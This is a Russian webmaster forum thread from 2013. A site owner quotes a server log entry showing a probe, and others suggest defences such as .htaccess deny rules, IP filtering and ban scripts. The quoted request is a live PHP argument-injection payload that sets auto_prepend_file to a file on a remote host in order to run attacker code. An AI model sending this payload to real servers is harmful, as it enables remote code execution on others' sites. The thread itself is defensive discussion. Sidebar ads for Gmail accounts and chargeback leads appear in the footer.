Нащупывают уязвимости сервера

Сообщений: 3448 Регистрация: Май 2011

6 Октября 2013 22:33

Сегодня заметил, что сайт долго открывается, полез в логи (вдруг доссят подумал я)

Заметил странный повторяющийся запрос:

Цитата
12.175.18.217 - - [07/Oct/2013:00:27:14 +0600] "GET /?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F61.19.253.26%2Fecho.txt HTTP/1.0" 403 482 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"

По ссылке http://61.19.253.26/echo.txt нашлось следующее:

Код
<?php echo "dsfer34w5rlsidfosdedfpsd"; ?>

По этому куску кода нашлось следующее: https://plus.google.com/110937633080014620803/posts/TKa9TUWafjs
Как я понял, мой сервер нащупывают..

Пока запретил данному айпи коннектиться к серверу через .htaccess
Что посоветуете? Кто-то с таким сталкивался?

Не подписываюсь на темы, так что не слежу за вопросами, которые вы оставляете в топике после меня. Если нужно получить ответ, пишите в ЛС с указанием ссылки на мой комментарий.

Олег

Сообщений: 3242 Регистрация: Окт 2010

6 Октября 2013 22:53

У меня время от времени подобных запросов просто шквал появляется. Пока тьфу - тьфу все в порядке. Правда половина из них направленна на поиск уязвимостей базы данных, которая в моем случае отсутствует:) Также ограничил доступ к серверу по ip

Прогон по Twitter, FriendFeed, Jujuju, и Livejournal - быстробот гарантирован

Качественный хостинг от 50 р.

Лучшая биржа контента

GoogleBot

Сообщений: 261 Регистрация: Сен 2013

6 Октября 2013 23:05

Выставляем правильные права на директории.

Также, в хтаксесс вставляем:

Код
Order allow,deny Deny from all

Изменено: GoogleBot - 6 Октября 2013 23:06

Coder

Сообщений: 10568 Регистрация: Мар 2013

6 Октября 2013 23:44

Цитата
Олег пишет: ограничил доступ к серверу по ip

Как-то много было ботов и всякого, и утомительно получалось все время по ftp в htaccess заходить. Небольшой скрипт помог упростить задачу (в обход htaccess) - и, что самое интересное, потихоньку перестали "долбится" время от времени новый всплывает, но это уже несравнимо с прежним:

Запрет/бан доступа на сайт/страницу по ip через php: _http://coder.hol.es/archive/ban_ip_php

✓ Проверенные скрипты и полезности для сайта

✓ Курсы

✓ Сервис временных ссылок

Алик Яушев

Сообщений: 3448 Регистрация: Май 2011

7 Октября 2013 06:50

Цитата
Coder пишет: утомительно

Ничего себе решение для утомительно...
Честно, улыбнуло... ваш способ не легче.

Coder

Сообщений: 10568 Регистрация: Мар 2013

7 Октября 2013 10:30

Цитата
Алик Яушев пишет: Честно, улыбнуло... ваш способ не легче.

=) Легче таки. По ftp нужно входить, открывать htaccess, смотреть лог, сравнивать, внесен или нет ip (а если их 100 и более?). А здесь удобно - зашел в админку, вызвал всплывающее окно, расположил его в окне лога, выбрал все нужные ip и тут же внес и сохранил. Если были дубли - убралось, все остальное - записалось и отсортировалось. В ftp не нужно входить, htaccess трогать не нужно.

Имхо, конечно.

Алик Яушев

Сообщений: 3448 Регистрация: Май 2011

7 Октября 2013 10:39

В моем случае все делаю через SSH клиент.
Выявляю запросы: tail -f /var/log/apache2/site_access.log
Через тот же клиент делаю корректировку в штацесс. Дело 2-ух минут максимум.
Я не любитель сторонних php скриптов.

Coder

Сообщений: 10568 Регистрация: Мар 2013

7 Октября 2013 11:11

Цитата
Алик Яушев пишет: Я не любитель сторонних php скриптов

Понятно. Каждый выбирает по-своему.

Олег

Сообщений: 3242 Регистрация: Окт 2010

7 Октября 2013 15:15

Цитата

Coder пишет:
Олег пишет:
ограничил доступ к серверу по ipКак-то много было ботов и всякого, и утомительно получалось все время по ftp в htaccess заходить. Небольшой скрипт помог упростить задачу (в обход htaccess) - и, что самое интересное, потихоньку перестали "долбится" время от времени новый всплывает, но это уже несравнимо с прежним:

Так я не ip баню, а ограничил доступ к серверу по ip, т.е. к шелу и ftp можно подключиться только с моего ip. Тоже самое касается админки каждого сайта. А каждый ip банить - это гиблое дело

Индульгенция

Сообщений: 1513 Регистрация: Окт 2013

#10

7 Октября 2013 15:59

Олег, хотел тоже как и вы ограничить доступ только своим ипом, да только задумался и передумал. А задумался вот над какими вопросами:

IP та у меня динамический, как быть тогда?
А вдруг нужно будет срочно с чужой точки доступа зайти (в гостях или командировке), как тогда быть?

Блатные слова.

Олег

Сообщений: 3242 Регистрация: Окт 2010

#11

7 Октября 2013 17:55

Цитата
Индульгенция пишет: IP та у меня динамический, как быть тогда?

У меня тоже, мегафон - модем. Попросил у них диапазон ip своего региона и сделал фильтр по маске

Цитата
Индульгенция пишет: А вдруг нужно будет срочно с чужой точки доступа зайти (в гостях

У вас такая необходимость часто появляется? У меня за 3 года работы в сети не разу.

Цитата
Индульгенция пишет: командировке

Заблаговременно изменить фильтр либо убрать его вообще на время командировки

Индульгенция

Сообщений: 1513 Регистрация: Окт 2013

#12

7 Октября 2013 18:01

Цитата
Олег пишет: У меня тоже, мегафон - модем. Попросил у них диапазон ip своего региона и сделал фильтр по маске

Этот вопрос решен. теперь знаю ответ.

Цитата
Олег пишет: У вас такая необходимость часто появляется? У меня за 3 года работы в сети не разу.

А вот это как раз бывает. Не совсем часто, но раза 2-3 в месяц. Подойдет только:

Цитата
Олег пишет: убрать его вообще на время

Олег

Сообщений: 3242 Регистрация: Окт 2010

#13

7 Октября 2013 18:05

Цитата
Индульгенция пишет: А вот это как раз бывает. Не совсем часто, но раза 2-3 в месяц. Подойдет только:

Мобильный модем и ходите с ним в гости:)

Индульгенция

Сообщений: 1513 Регистрация: Окт 2013

#14

7 Октября 2013 18:11

"Убедили"

. Осталось теперь реализовать. Спасибо за информацию.

Coder

Сообщений: 10568 Регистрация: Мар 2013

#15

7 Октября 2013 18:54

Цитата
Олег пишет: А каждый ip банить - это гиблое дело

Тут от ситуации зависит. Тут комплексный подход к ряду проблем: например, некоторые боты, так сказать, злостные, оставляли рекламу в отзывах, форумах. ip один и тот же - "долбятся" по-тупому, так сказать, ресурсы кушают. Этих - сразу в бан, для остальных - капчу математическую или картиночную.

Но, как уже было сказано, каждый свое выбирает.

Имхо, конечно.

Кстати, на некоторых хостингах (jino, например), можно вообще отключать доступ по ftp и подключать по необходимости из аккаунта.

Изменено: Coder - 7 Октября 2013 18:56

Похожие темы:

11.02.2012 10:36	Уязвимости в почтовом сервисе "Яндекса"
06.01.2012 17:29	подскажите кто может проверить сайт на уязвимости
01.02.2011 21:39	Microsoft предупредила пользователей об уязвимости в интернет Explorer
02.11.2010 17:02	Google заплатит пользователям за найденные на своих сайтах уязвимости

Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)

Новые темы	Объявления	Свободное общение
13:54 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 14:50 Индексация страниц 12:36 У кого новостник, дайте пару советов плиз 13:53 AviTool - мощный инструмент для автоматизации работы с Avito 17:01 Absence в Армении 23:19 Ребята подскажите какими сервисами и прогами вы пользуетесь для SEO продвижения? 14:50 Какую выбрать тему/нишу для сайта?	16:02 Продам аккаунты Gmail USA IP \| Gmail MIX IP \| Outlook Old 19:37 Продажа лидов: форекс, инвестиции, нативка, гемблинг, чарджбеки 15:45 Резидентные Прокси Ротационные BACKCONNECT США Европа Микс 22:37 BestX24 - быстрый и безопасный обменник криптовалют и электронных денежных средств 18:11 Обменник криптовалюты OnlyCrypto 17:56 Услуга: Поведенческие факторы (ПФ) для Авито 17:31 CactusPay.PRO \| Умная платёжная система с выводом в USDT TRC-20	05:04 Точные прогнозы на футбол 14:01 Union Pharm - топовая фарма-партнерка для профессионалов! 10:59 Ням-ням! - 8 деликатесов, которые когда-то ели только бедные люди 12:23 150+ хакерских поисковых систем и инструментов 08:38 Накрутка поисковых подсказок 17:41 Стряхнуть обыденность - об Агасфере 10:54 Добро пожаловать в цифровой мир...